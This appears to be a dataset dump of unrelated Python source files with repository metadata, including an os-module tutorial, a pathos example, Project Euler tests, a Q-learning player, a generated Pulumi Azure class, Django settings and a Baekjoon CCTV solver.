96fd2bd857643c663092d384cf8ec78d6b61a6cf | fb0f6646b2a7972454453907fbdc656b7471f55f | /p322_module_os.py | dd9437674eb42016e5d93c9c80fd0ac56ab764e7 | [] | no_license | woojin97318/python_basic | 6497d5c85369746edfe8ca79ad7f3f47c871ee66 | 97e9a322a08f1483bf35dc03507ac36af2bf1ddb | refs/heads/master | 2023-07-15T03:06:05.716623 | 2021-08-25T03:46:48 | 2021-08-25T03:46:48 | 399,681,125 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 619 | py | # 모듈을 읽어 들입니다.
import os
# Print some basic information.
print("Current OS:", os.name)
print("Current folder:", os.getcwd())
print("Contents of the current folder:", os.listdir())
# Create and remove a folder. [A folder can only be removed when it is empty.]
os.mkdir("hello")
os.rmdir("hello")
# Create a file + rename the file.
with open("original.txt", "w") as file:
    file.write("hello")
os.rename("original.txt", "new.txt")
# Remove the file.
os.remove("new.txt")
# os.unlink("new.txt")
# Run a system command.
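# Note: "dir" is a Windows shell command; on macOS/Linux use os.system("ls").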
os.system("dir") | [
"[email protected]"
] | |
44b780296f882a1446213f64764a325db1448200 | 850001831b1fcdd4d27e328b356fc34909ca2917 | /examples/spawn.py | 367e288dfa2b65a8b6bb4a47c0514b8b5cd14e4f | [
"BSD-3-Clause"
] | permissive | yidiq7/pathos | b337353ccfe447866c46a4a784a7908c2f3fe31e | 7e4fef911dc0283e245189df4683eea65bfd90f0 | refs/heads/master | 2022-08-24T08:43:34.009115 | 2020-05-27T12:18:21 | 2020-05-27T12:18:21 | 267,310,390 | 0 | 0 | NOASSERTION | 2020-05-27T12:14:50 | 2020-05-27T12:14:47 | null | UTF-8 | Python | false | false | 957 | py | #!/usr/bin/env python
#
# Author: Mike McKerns (mmckerns @caltech and @uqfoundation)
# Copyright (c) 1997-2016 California Institute of Technology.
# Copyright (c) 2016-2020 The Uncertainty Quantification Foundation.
# License: 3-clause BSD. The full license text is available at:
# - https://github.com/uqfoundation/pathos/blob/master/LICENSE
"""
demonstrate pathos's spawn2 function
"""
from __future__ import print_function
from pathos.util import spawn2, _b, _str
if __name__ == '__main__':
import os
def onParent(pid, fromchild, tochild):
s = _str(fromchild.readline())
print(s, end='')
tochild.write(_b('hello son\n'))
tochild.flush()
os.wait()
def onChild(pid, fromparent, toparent):
toparent.write(_b('hello dad\n'))
toparent.flush()
s = _str(fromparent.readline())
print(s, end='')
os._exit(0)
spawn2(onParent, onChild)
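    # Expected output (a sketch; the parent echoes the child's line first):
    #   hello dad
    #   hello son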
# End of file
| [
"mmckerns@8bfda07e-5b16-0410-ab1d-fd04ec2748df"
] | mmckerns@8bfda07e-5b16-0410-ab1d-fd04ec2748df |
6da151561ebdbcbd2e1ef59f98ad58c5ba0e4fdd | 9b1da04d8c66b8fb429120c902e4022506a05f5a | /apc_pcl/pysrc/apc_tools/__init__.py | a4d7113fa1bb4ff799cd3927888c039cacc468a9 | [] | no_license | ehuang3/apc_ros | 49533b7c6ec9a13d45914b0c252c88c7413731a7 | 050871ec3e85c53fe1b0e4612abbbfa07db75f59 | refs/heads/master | 2021-01-10T12:30:49.700225 | 2015-05-27T03:41:20 | 2015-05-27T03:41:20 | 36,998,288 | 4 | 0 | null | null | null | null | UTF-8 | Python | false | false | 95 | py | from .bin_segmenter import Bin_Segmenter
from .utils import *
from .misc import load_background | [
"[email protected]"
] | |
daa82ba337e7c7ea48f602e231247e8415e0c3dc | 805fbd9aead4fc2998fd5d8790043a20b2656915 | /data_format/__init__.py | cb3c33b9d09bcf03a38af8f8bdd84bd066689fa1 | [] | no_license | chenhaomingbob/ToolBox | f9a6ef64352c85ae84c44e9fab53aab74992c7c5 | 962304c004aa39e8a5bcb153def9dc3895595c9f | refs/heads/master | 2021-05-19T00:37:23.170766 | 2020-06-01T10:57:05 | 2020-06-01T10:57:05 | 251,496,830 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 145 | py | #!/usr/bin/python
# -*- coding:utf8 -*-
"""
Author: Haoming Chen
E-mail: [email protected]
Time: 2020/03/23
Description:
""" | [
"[email protected]"
] | |
d3743b3de00d52481bf2c74a20fb31405afce4c4 | fb81442e5d2e940ad967bd0a264b7918d739173f | /py_test.py | 49e8b365b34d93965925230a57e83abad11d1008 | [] | no_license | Amertz08/euler_py | 054f45d110b8cf4d0e9afeb7f5c608026226443c | 0dd217c9e0a061e3622fd150b61e24a2c6bad5af | refs/heads/master | 2021-05-06T23:15:42.742578 | 2017-12-07T00:16:31 | 2017-12-07T00:16:31 | 112,960,695 | 0 | 1 | null | 2017-12-06T20:32:57 | 2017-12-03T20:21:48 | C | UTF-8 | Python | false | false | 515 | py | import euler_py as eul
def test_problem_one():
result = eul.problem_one(10)
assert result == 23, f'Problem 1 should be 23: {result}'
def test_problem_two():
result = eul.problem_two(89)
assert result == 44, f'Problem 2 should be 44: {result}'
def test_problem_three():
result = eul.problem_three(13195)
assert result == 29, f'Problem 3 should be 29: {result}'
def test_problem_four():
result = eul.problem_four(2)
assert result == 9009, f'Problem 4 should be 9009: {result}'
| [
"[email protected]"
] | |
516373953da84479aba9b11e0bae3dbf7d26ccf5 | bb41814dc79f56a082a777e17ed31320db43edf4 | /reinforcement_learning/0x00-q_learning/4-play.py | d6b4d54e98814a6ad8799721a6031a8177cbde91 | [] | no_license | garimasinghgryffindor/holbertonschool-machine_learning | a92c619b6ad2d110ed97b33fa9903f5134c96866 | 856ee36006c2ff656877d592c2ddb7c941d63780 | refs/heads/master | 2023-08-01T09:58:13.863062 | 2020-11-28T00:50:55 | 2020-11-28T00:50:55 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 674 | py | #!/usr/bin/env python3
"""
Has the trained agent play an episode
"""
import numpy as np
def play(env, Q, max_steps=100):
"""
Has the trained agent play an episode
:param env: is the FrozenLakeEnv instance
:param Q: is a numpy.ndarray containing the Q-table
:param max_steps: is the maximum number of steps in the episode
:return: the total rewards for the episode
"""
state = env.reset()
env.render()
for step in range(max_steps):
action = np.argmax(Q[state])
new_state, reward, done, info = env.step(action)
env.render()
if done:
return reward
state = new_state
env.close()
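# Example usage (a sketch; assumes OpenAI Gym's FrozenLake environment and a
# Q-table trained elsewhere in this project):
# import gym
# env = gym.make('FrozenLake-v0')
# Q = np.load('q_table.npy')  # hypothetical saved Q-table
# total_reward = play(env, Q, max_steps=100)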
| [
"[email protected]"
] | |
538609c419c2927cdc8dfadedbe9bd4adf2e7c9f | 82b946da326148a3c1c1f687f96c0da165bb2c15 | /sdk/python/pulumi_azure_native/datashare/v20201001preview/data_set_mapping.py | e00a71eae41a251fe545b0c3ef3d7cbfc785120d | [
"Apache-2.0",
"BSD-3-Clause"
] | permissive | morrell/pulumi-azure-native | 3916e978382366607f3df0a669f24cb16293ff5e | cd3ba4b9cb08c5e1df7674c1c71695b80e443f08 | refs/heads/master | 2023-06-20T19:37:05.414924 | 2021-07-19T20:57:53 | 2021-07-19T20:57:53 | 387,815,163 | 0 | 0 | Apache-2.0 | 2021-07-20T14:18:29 | 2021-07-20T14:18:28 | null | UTF-8 | Python | false | false | 12,170 | py | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from ... import _utilities
from . import outputs
from ._enums import *
__all__ = ['DataSetMappingArgs', 'DataSetMapping']
@pulumi.input_type
class DataSetMappingArgs:
def __init__(__self__, *,
account_name: pulumi.Input[str],
kind: pulumi.Input[Union[str, 'DataSetMappingKind']],
resource_group_name: pulumi.Input[str],
share_subscription_name: pulumi.Input[str],
data_set_mapping_name: Optional[pulumi.Input[str]] = None):
"""
The set of arguments for constructing a DataSetMapping resource.
:param pulumi.Input[str] account_name: The name of the share account.
:param pulumi.Input[Union[str, 'DataSetMappingKind']] kind: Kind of data set mapping.
:param pulumi.Input[str] resource_group_name: The resource group name.
:param pulumi.Input[str] share_subscription_name: The name of the share subscription which will hold the data set sink.
:param pulumi.Input[str] data_set_mapping_name: The name of the data set mapping to be created.
"""
pulumi.set(__self__, "account_name", account_name)
pulumi.set(__self__, "kind", kind)
pulumi.set(__self__, "resource_group_name", resource_group_name)
pulumi.set(__self__, "share_subscription_name", share_subscription_name)
if data_set_mapping_name is not None:
pulumi.set(__self__, "data_set_mapping_name", data_set_mapping_name)
@property
@pulumi.getter(name="accountName")
def account_name(self) -> pulumi.Input[str]:
"""
The name of the share account.
"""
return pulumi.get(self, "account_name")
@account_name.setter
def account_name(self, value: pulumi.Input[str]):
pulumi.set(self, "account_name", value)
@property
@pulumi.getter
def kind(self) -> pulumi.Input[Union[str, 'DataSetMappingKind']]:
"""
Kind of data set mapping.
"""
return pulumi.get(self, "kind")
@kind.setter
def kind(self, value: pulumi.Input[Union[str, 'DataSetMappingKind']]):
pulumi.set(self, "kind", value)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Input[str]:
"""
The resource group name.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: pulumi.Input[str]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter(name="shareSubscriptionName")
def share_subscription_name(self) -> pulumi.Input[str]:
"""
The name of the share subscription which will hold the data set sink.
"""
return pulumi.get(self, "share_subscription_name")
@share_subscription_name.setter
def share_subscription_name(self, value: pulumi.Input[str]):
pulumi.set(self, "share_subscription_name", value)
@property
@pulumi.getter(name="dataSetMappingName")
def data_set_mapping_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the data set mapping to be created.
"""
return pulumi.get(self, "data_set_mapping_name")
@data_set_mapping_name.setter
def data_set_mapping_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "data_set_mapping_name", value)
warnings.warn("""Please use one of the variants: ADLSGen2FileDataSetMapping, ADLSGen2FileSystemDataSetMapping, ADLSGen2FolderDataSetMapping, ADLSGen2StorageAccountDataSetMapping, BlobContainerDataSetMapping, BlobDataSetMapping, BlobFolderDataSetMapping, BlobStorageAccountDataSetMapping, KustoClusterDataSetMapping, KustoDatabaseDataSetMapping, SqlDBTableDataSetMapping, SqlDWTableDataSetMapping, SynapseWorkspaceSqlPoolTableDataSetMapping.""", DeprecationWarning)
class DataSetMapping(pulumi.CustomResource):
warnings.warn("""Please use one of the variants: ADLSGen2FileDataSetMapping, ADLSGen2FileSystemDataSetMapping, ADLSGen2FolderDataSetMapping, ADLSGen2StorageAccountDataSetMapping, BlobContainerDataSetMapping, BlobDataSetMapping, BlobFolderDataSetMapping, BlobStorageAccountDataSetMapping, KustoClusterDataSetMapping, KustoDatabaseDataSetMapping, SqlDBTableDataSetMapping, SqlDWTableDataSetMapping, SynapseWorkspaceSqlPoolTableDataSetMapping.""", DeprecationWarning)
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
account_name: Optional[pulumi.Input[str]] = None,
data_set_mapping_name: Optional[pulumi.Input[str]] = None,
kind: Optional[pulumi.Input[Union[str, 'DataSetMappingKind']]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
share_subscription_name: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
A data set mapping data transfer object.
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] account_name: The name of the share account.
:param pulumi.Input[str] data_set_mapping_name: The name of the data set mapping to be created.
:param pulumi.Input[Union[str, 'DataSetMappingKind']] kind: Kind of data set mapping.
:param pulumi.Input[str] resource_group_name: The resource group name.
:param pulumi.Input[str] share_subscription_name: The name of the share subscription which will hold the data set sink.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: DataSetMappingArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
A data set mapping data transfer object.
:param str resource_name: The name of the resource.
:param DataSetMappingArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(DataSetMappingArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
account_name: Optional[pulumi.Input[str]] = None,
data_set_mapping_name: Optional[pulumi.Input[str]] = None,
kind: Optional[pulumi.Input[Union[str, 'DataSetMappingKind']]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
share_subscription_name: Optional[pulumi.Input[str]] = None,
__props__=None):
pulumi.log.warn("""DataSetMapping is deprecated: Please use one of the variants: ADLSGen2FileDataSetMapping, ADLSGen2FileSystemDataSetMapping, ADLSGen2FolderDataSetMapping, ADLSGen2StorageAccountDataSetMapping, BlobContainerDataSetMapping, BlobDataSetMapping, BlobFolderDataSetMapping, BlobStorageAccountDataSetMapping, KustoClusterDataSetMapping, KustoDatabaseDataSetMapping, SqlDBTableDataSetMapping, SqlDWTableDataSetMapping, SynapseWorkspaceSqlPoolTableDataSetMapping.""")
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = DataSetMappingArgs.__new__(DataSetMappingArgs)
if account_name is None and not opts.urn:
raise TypeError("Missing required property 'account_name'")
__props__.__dict__["account_name"] = account_name
__props__.__dict__["data_set_mapping_name"] = data_set_mapping_name
if kind is None and not opts.urn:
raise TypeError("Missing required property 'kind'")
__props__.__dict__["kind"] = kind
if resource_group_name is None and not opts.urn:
raise TypeError("Missing required property 'resource_group_name'")
__props__.__dict__["resource_group_name"] = resource_group_name
if share_subscription_name is None and not opts.urn:
raise TypeError("Missing required property 'share_subscription_name'")
__props__.__dict__["share_subscription_name"] = share_subscription_name
__props__.__dict__["name"] = None
__props__.__dict__["system_data"] = None
__props__.__dict__["type"] = None
alias_opts = pulumi.ResourceOptions(aliases=[pulumi.Alias(type_="azure-nextgen:datashare/v20201001preview:DataSetMapping"), pulumi.Alias(type_="azure-native:datashare:DataSetMapping"), pulumi.Alias(type_="azure-nextgen:datashare:DataSetMapping"), pulumi.Alias(type_="azure-native:datashare/v20181101preview:DataSetMapping"), pulumi.Alias(type_="azure-nextgen:datashare/v20181101preview:DataSetMapping"), pulumi.Alias(type_="azure-native:datashare/v20191101:DataSetMapping"), pulumi.Alias(type_="azure-nextgen:datashare/v20191101:DataSetMapping"), pulumi.Alias(type_="azure-native:datashare/v20200901:DataSetMapping"), pulumi.Alias(type_="azure-nextgen:datashare/v20200901:DataSetMapping")])
opts = pulumi.ResourceOptions.merge(opts, alias_opts)
super(DataSetMapping, __self__).__init__(
'azure-native:datashare/v20201001preview:DataSetMapping',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None) -> 'DataSetMapping':
"""
Get an existing DataSetMapping resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = DataSetMappingArgs.__new__(DataSetMappingArgs)
__props__.__dict__["kind"] = None
__props__.__dict__["name"] = None
__props__.__dict__["system_data"] = None
__props__.__dict__["type"] = None
return DataSetMapping(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter
def kind(self) -> pulumi.Output[str]:
"""
Kind of data set mapping.
"""
return pulumi.get(self, "kind")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
Name of the azure resource
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="systemData")
def system_data(self) -> pulumi.Output['outputs.SystemDataResponse']:
"""
System Data of the Azure resource.
"""
return pulumi.get(self, "system_data")
@property
@pulumi.getter
def type(self) -> pulumi.Output[str]:
"""
Type of the azure resource
"""
return pulumi.get(self, "type")
| [
"[email protected]"
] | |
e79fb1916d742af9ebab6860a5bdb652ce86a1d1 | ede6ee7bdbd76dbb39ffcddfc98725062566ebf4 | /barbados/indexes/list.py | 6c9b98ec709fd610d48643a70555b79387304c46 | [] | no_license | cohoe/barbados | cfa3cb4fab8c183fc4a4f943f452a89ebe193ea2 | 343f8fd4ac1f18e5e93d519cbc064693280e4d00 | refs/heads/master | 2021-08-07T12:33:53.263230 | 2021-07-18T01:59:16 | 2021-07-18T01:59:16 | 234,824,108 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 541 | py | from elasticsearch_dsl import Document, Text, InnerDoc, Object
from barbados.indexes.base import BaseIndex, BarbadosIndex
class ListItemIndex(InnerDoc):
cocktail_slug = Text(analyzer='whitespace', search_analyzer='whitespace')
spec_slug = Text(analyzer='whitespace', search_analyzer='whitespace')
class ListIndex(Document, BarbadosIndex):
id = Text(analyzer='whitespace', search_analyzer='whitespace')
display_name = Text()
items = Object(ListItemIndex, multi=True)
class Index(BaseIndex):
name = 'list'
| [
"[email protected]"
] | |
e1bb0795b99caf9bd0e6effbaf3c0a068848378b | 12b7dc1d608b0deca429485493482afca5f99736 | /app/config/settings/dev.py | 8f40045b1ceefb621445b8de6efa70ce96e82c8e | [] | no_license | Ryanden/EB-Docker-Deploy2-practice- | 3c147786ccb6567c8e325ac79527052a15152a4a | 4e12f4e35da6d26979b6915165227f9167c507d5 | refs/heads/master | 2022-12-09T09:37:51.404751 | 2019-05-16T05:04:15 | 2019-05-16T05:04:15 | 142,002,119 | 0 | 0 | null | 2022-12-08T02:36:17 | 2018-07-23T10:58:30 | Python | UTF-8 | Python | false | false | 369 | py | from .base import *
secrets = json.load(open(os.path.join(SECRETS_DIR, 'dev.json')))
DEBUG = True
INSTALLED_APPS += [
'storages',
'django_extensions'
]
DEFAULT_FILE_STORAGE = 'config.storages.S3DefaultStorage'
AWS_STORAGE_BUCKET_NAME = secrets['AWS_STORAGE_BUCKET_NAME']
WSGI_APPLICATION = 'config.wsgi.dev.application'
DATABASES = secrets['DATABASES']
| [
"[email protected]"
] | |
d20bfefcbb689e95a0e699712752808cee0aabd1 | 5966449d2e29c9b64351895db2932f94f9de42da | /catkin_ws/build/calibration_common/catkin_generated/pkg.develspace.context.pc.py | 74b3622b6da1649f18d3cf518a907cdaf2f04265 | [] | no_license | godaeseong/GoHriProject | 8cbce6934485b8ba3253fc7b6c5b5b59397b4518 | 425e70b7c91b6215f5477fc2250d2b0ac96577be | refs/heads/master | 2021-05-11T22:11:56.099580 | 2018-01-15T02:20:43 | 2018-01-15T02:20:43 | 117,484,817 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 613 | py | # generated from catkin/cmake/template/pkg.context.pc.in
CATKIN_PACKAGE_PREFIX = ""
PROJECT_PKG_CONFIG_INCLUDE_DIRS = "/home/hri/catkin_ws/src/calibration_toolkit/calibration_common/include;/usr/include/eigen3".split(';') if "/home/hri/catkin_ws/src/calibration_toolkit/calibration_common/include;/usr/include/eigen3" != "" else []
PROJECT_CATKIN_DEPENDS = "cmake_modules;image_geometry".replace(';', ' ')
PKG_CONFIG_LIBRARIES_WITH_PREFIX = "".split(';') if "" != "" else []
PROJECT_NAME = "calibration_common"
PROJECT_SPACE_DIR = "/home/hri/catkin_ws/devel/.private/calibration_common"
PROJECT_VERSION = "1.0.0"
| [
"[email protected]"
] | |
6c191364901cf72b6e7ec942af7f4fc7c333ad1a | fc353b0433348ff58841cf32bf1f5e594e037513 | /leetcode/830.py | 8c5023a11d45ce74865a0054c858b8aaa012615c | [] | no_license | TrellixVulnTeam/Demo_933I | ce759ec52dd191f99b998862f4aba7971878ba37 | ab662060eb07a88a48c9832e09bf268517c1a3fa | refs/heads/master | 2023-04-27T16:55:29.627491 | 2021-05-07T05:38:58 | 2021-05-07T05:38:58 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 230 | py | from graphics import *
import math
spriaal = GraphWin("Joonistus", 1000, 1000)
a = 5
b = 4
while True:
x = math.sin(a + math.pi() / 2)
y = math.sin()
pt = Point(x + 500, y + 500)
pt.draw(spriaal)
| [
"[email protected]"
] | |
0474c7ac7fcab24e97fcd8a5d1fc67dd45461b2f | 3a476e0de377d1580facbfd78efdfbca009ed7a3 | /uct_test.py | 403c551b8a4100fa685aca7eda34a6d39cf067a1 | [
"MIT"
] | permissive | liuruoze/Thought-SC2 | b7366186dbb4494fabdb3e0104354665e21ff707 | b3cfbeffbfa09b952c596805d2006af24613db2d | refs/heads/master | 2023-04-28T11:47:56.771797 | 2021-01-15T00:25:26 | 2021-01-15T00:25:26 | 296,185,180 | 4 | 2 | MIT | 2023-04-24T09:06:48 | 2020-09-17T01:17:04 | Python | UTF-8 | Python | false | false | 1,300 | py | USED_DEVICES = "6,7"
import os
os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID"
os.environ["CUDA_VISIBLE_DEVICES"] = USED_DEVICES
from uct.numpy_impl import *
import tensorflow as tf
from prototype.dynamic_network import DynamicNetwork
from prototype.hier_network import HierNetwork
def test(is_restore_policy=True, is_restore_dynamic=True):
# train model
config = tf.ConfigProto(
allow_soft_placement=True, log_device_placement=False,
)
config.gpu_options.allow_growth = True
sess = tf.Session(config=config)
hier_net = HierNetwork(sess, policy_path='./model/20181217-154646/probe')
hier_net.initialize()
if is_restore_policy:
hier_net.restore_policy()
policy_net = PolicyNetinMCTS(hier_net)
dynamic_model_path = './model/20181223-174748_dynamic/probe'
if is_restore_dynamic:
hier_net.restore_dynamic(dynamic_model_path)
dynamic_net = hier_net.dynamic_net
num_reads = 100
import time
tick = time.time()
print(UCT_search(GameState(dynamic_net), num_reads, policy_net))
tock = time.time()
print("Took %s sec to run %s times" % (tock - tick, num_reads))
#import resource
#print("Consumed %sB memory" % resource.getrusage(resource.RUSAGE_SELF).ru_maxrss)
if __name__ == "__main__":
test()
| [
"[email protected]"
] | |
1f3f19f03def5c7a6c1e1e2eb72b4fa33bdf7c50 | 6b5572557c4a0785c4b727ee024790ec066ad6f2 | /Baekjoon/삼성 SW 역량 테스트 기출 문제/감시.py | 17577c83e70a00bb1a4e4811333b625744615101 | [] | no_license | easternpillar/AlgorithmTraining | 5be38998dc062d1d02933f61eaca3265e1b73981 | c8f05eda86161a7dbacab99154be1af292e7db8a | refs/heads/master | 2023-04-29T11:13:34.984005 | 2023-04-08T07:12:29 | 2023-04-08T07:12:29 | 231,875,419 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,986 | py | # Problem:
# Given the structure of office, return the minimum number of blind spots.
# My Solution:
from collections import deque
import copy
def camera1(o, pos):
re = []
temp = copy.deepcopy(o)
r, c = pos[0], pos[1]
while r > 0:
r -= 1
if temp[r][c] == 6:
break
if temp[r][c] == 0:
temp[r][c] = '#'
else:
continue
re.append(temp)
temp = copy.deepcopy(o)
r, c = pos[0], pos[1]
while r < len(temp) - 1:
r += 1
if temp[r][c] == 6:
break
if temp[r][c] == 0:
temp[r][c] = '#'
else:
continue
re.append(temp)
temp = copy.deepcopy(o)
r, c = pos[0], pos[1]
while c > 0:
c -= 1
if temp[r][c] == 6:
break
if temp[r][c] == 0:
temp[r][c] = '#'
else:
continue
re.append(temp)
temp = copy.deepcopy(o)
r, c = pos[0], pos[1]
while c < len(temp[0]) - 1:
c += 1
if temp[r][c] == 6:
break
if temp[r][c] == 0:
temp[r][c] = '#'
else:
continue
re.append(temp)
return re
def camera2(o, pos):
temp = copy.deepcopy(o)
re = []
r, c = pos[0], pos[1]
while r > 0:
r -= 1
if temp[r][c] == 6:
break
if temp[r][c] == 0:
temp[r][c] = '#'
else:
continue
r, c = pos[0], pos[1]
while r < len(temp) - 1:
r += 1
if temp[r][c] == 6:
break
if temp[r][c] == 0:
temp[r][c] = '#'
else:
continue
re.append(temp)
temp = copy.deepcopy(o)
r, c = pos[0], pos[1]
while c > 0:
c -= 1
if temp[r][c] == 6:
break
if temp[r][c] == 0:
temp[r][c] = '#'
else:
continue
r, c = pos[0], pos[1]
while c < len(temp[0]) - 1:
c += 1
if temp[r][c] == 6:
break
if temp[r][c] == 0:
temp[r][c] = '#'
else:
continue
re.append(temp)
return re
def camera3(o, pos):
re = []
temp = copy.deepcopy(o)
r, c = pos[0], pos[1]
while r > 0:
r -= 1
if temp[r][c] == 6:
break
if temp[r][c] == 0:
temp[r][c] = '#'
else:
continue
r, c = pos[0], pos[1]
while c < len(temp[0]) - 1:
c += 1
if temp[r][c] == 6:
break
if temp[r][c] == 0:
temp[r][c] = '#'
else:
continue
re.append(temp)
temp = copy.deepcopy(o)
r, c = pos[0], pos[1]
while r < len(temp) - 1:
r += 1
if temp[r][c] == 6:
break
if temp[r][c] == 0:
temp[r][c] = '#'
else:
continue
r, c = pos[0], pos[1]
while c < len(temp[0]) - 1:
c += 1
if temp[r][c] == 6:
break
if temp[r][c] == 0:
temp[r][c] = '#'
else:
continue
re.append(temp)
temp = copy.deepcopy(o)
r, c = pos[0], pos[1]
while c > 0:
c -= 1
if temp[r][c] == 6:
break
if temp[r][c] == 0:
temp[r][c] = '#'
else:
continue
r, c = pos[0], pos[1]
while r > 0:
r -= 1
if temp[r][c] == 6:
break
if temp[r][c] == 0:
temp[r][c] = '#'
else:
continue
re.append(temp)
temp = copy.deepcopy(o)
r, c = pos[0], pos[1]
while c > 0:
c -= 1
if temp[r][c] == 6:
break
if temp[r][c] == 0:
temp[r][c] = '#'
else:
continue
r, c = pos[0], pos[1]
while r < len(temp) - 1:
r += 1
if temp[r][c] == 6:
break
if temp[r][c] == 0:
temp[r][c] = '#'
else:
continue
re.append(temp)
return re
def camera4(o, pos):
re = []
    # right, up, left
temp = copy.deepcopy(o)
r, c = pos[0], pos[1]
while r > 0:
r -= 1
if temp[r][c] == 6:
break
if temp[r][c] == 0:
temp[r][c] = '#'
else:
continue
r, c = pos[0], pos[1]
while c > 0:
c -= 1
if temp[r][c] == 6:
break
if temp[r][c] == 0:
temp[r][c] = '#'
else:
continue
r, c = pos[0], pos[1]
while c < len(temp[0]) - 1:
c += 1
if temp[r][c] == 6:
break
if temp[r][c] == 0:
temp[r][c] = '#'
else:
continue
re.append(temp)
    # right, down, left
temp = copy.deepcopy(o)
r, c = pos[0], pos[1]
while r < len(temp) - 1:
r += 1
if temp[r][c] == 6:
break
if temp[r][c] == 0:
temp[r][c] = '#'
else:
continue
r, c = pos[0], pos[1]
while c > 0:
c -= 1
if temp[r][c] == 6:
break
if temp[r][c] == 0:
temp[r][c] = '#'
else:
continue
r, c = pos[0], pos[1]
while c < len(temp[0]) - 1:
c += 1
if temp[r][c] == 6:
break
if temp[r][c] == 0:
temp[r][c] = '#'
else:
continue
re.append(temp)
    # left, up, down
temp = copy.deepcopy(o)
r, c = pos[0], pos[1]
while c > 0:
c -= 1
if temp[r][c] == 6:
break
if temp[r][c] == 0:
temp[r][c] = '#'
else:
continue
r, c = pos[0], pos[1]
while r < len(temp) - 1:
r += 1
if temp[r][c] == 6:
break
if temp[r][c] == 0:
temp[r][c] = '#'
else:
continue
r, c = pos[0], pos[1]
while r > 0:
r -= 1
if temp[r][c] == 6:
break
if temp[r][c] == 0:
temp[r][c] = '#'
else:
continue
re.append(temp)
    # right, up, down
temp = copy.deepcopy(o)
r, c = pos[0], pos[1]
while c < len(temp[0]) - 1:
c += 1
if temp[r][c] == 6:
break
if temp[r][c] == 0:
temp[r][c] = '#'
else:
continue
r, c = pos[0], pos[1]
while r > 0:
r -= 1
if temp[r][c] == 6:
break
if temp[r][c] == 0:
temp[r][c] = '#'
else:
continue
r, c = pos[0], pos[1]
while r < len(temp) - 1:
r += 1
if temp[r][c] == 6:
break
if temp[r][c] == 0:
temp[r][c] = '#'
else:
continue
re.append(temp)
return re
def camera5(o, pos):
temp = copy.deepcopy(o)
r, c = pos[0], pos[1]
while r > 0:
r -= 1
if temp[r][c] == 6:
break
if temp[r][c] == 0:
temp[r][c] = '#'
else:
continue
r, c = pos[0], pos[1]
while c > 0:
c -= 1
if temp[r][c] == 6:
break
if temp[r][c] == 0:
temp[r][c] = '#'
else:
continue
r, c = pos[0], pos[1]
while c < len(temp[0]) - 1:
c += 1
if temp[r][c] == 6:
break
if temp[r][c] == 0:
temp[r][c] = '#'
else:
continue
r, c = pos[0], pos[1]
while r < len(temp) - 1:
r += 1
if temp[r][c] == 6:
break
if temp[r][c] == 0:
temp[r][c] = '#'
else:
continue
return temp
r, c = map(int, input().split())
office = [list(map(int, list(input().split()))) for _ in range(r)]
origin=0
for i in range(len(office)):
for j in range(len(office[i])):
if office[i][j]==0:
origin+=1
offices = deque([office])
cam = deque()
for i in range(r):
for j in range(c):
if 1 <= office[i][j] <= 5:
cam.append([i, j])
answer=set()
while cam:
c = cam.popleft()
x, y = c[0], c[1]
new_office = []
while offices:
o = offices.popleft()
if o[x][y] == 1:
new_office.extend(camera1(o, [x, y]))
elif o[x][y] == 2:
new_office.extend(camera2(o, [x, y]))
elif o[x][y] == 3:
new_office.extend(camera3(o, [x, y]))
elif o[x][y] == 4:
new_office.extend(camera4(o, [x, y]))
else:
new_office.append(camera5(o, [x, y]))
offices.extend(new_office)
if not cam:
while offices:
temp=offices.popleft()
cnt=0
for i in range(len(temp)):
for j in range(len(temp[i])):
if temp[i][j]==0:
cnt+=1
answer.add(cnt)
break
if answer:
print(min(answer))
else:
    print(origin)
| [
"[email protected]"
] | |
